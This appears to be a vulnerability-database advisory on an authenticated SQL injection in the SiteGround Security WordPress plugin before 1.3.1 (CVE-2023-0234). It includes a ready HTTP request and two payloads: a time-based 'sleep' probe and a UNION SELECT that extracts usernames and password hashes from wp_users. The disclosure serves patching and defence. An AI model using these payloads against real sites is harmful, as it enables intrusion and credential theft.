Lucene search
So SakaguchiWPEX-ID:ACF3E369-1290-4B3F-83BF-2209B9DD06E1HistoryJan 13, 2023 - 12:00 a.m.
SiteGround Security < 1.3.1 - Admin+ SQLi
2023-01-1300:00:00
So Sakaguchi
91
siteground
sql injection
security vulnerability
admin+
wp_users
wp-json
EPSS
0.001
Percentile
51.2%
The plugin does not properly sanitize user input before using it in an SQL query, leading to an authenticated SQL injection issue.
1:
POST /wordpress/index.php/wp-json/sg-security/v1/activity-registered HTTP/1.1
Host: YOUR HOST
X-WP-Nonce: YOUR NONCE
Cookie: [Admin+]
Content-Length: 155
{"limitedView":1,"filters":[{"wp_name":"user","children":[{"value":"1-sleep(3); #"}]}]}
2:
Alternate payload for extracting info from the wp_users table;
{"limitedView":1,"filters":[{"wp_name":"user","children":[{"value":"1 UNION SELECT 1,1,1,user_login,user_pass,1,1,1,1,1,1,1 FROM wp_users; #"}]}]}Related
prion
prion
Sql injection
2023-02-06 20:15:00
cvelist
cvelist
CVE-2023-0234 SiteGround Security < 1.3.1 - Admin+ SQLi
2023-02-06 19:59:32
wpvulndb
wpvulndb
SiteGround Security < 1.3.1 - Admin+ SQLi
2023-01-13 00:00:00
cve
cve
CVE-2023-0234
2023-02-06 20:15:14
openvas
openvas
WordPress SiteGround Security Plugin < 1.3.1 SQLi Vulnerability
2023-07-17 00:00:00
nvd
nvd
CVE-2023-0234
2023-02-06 20:15:14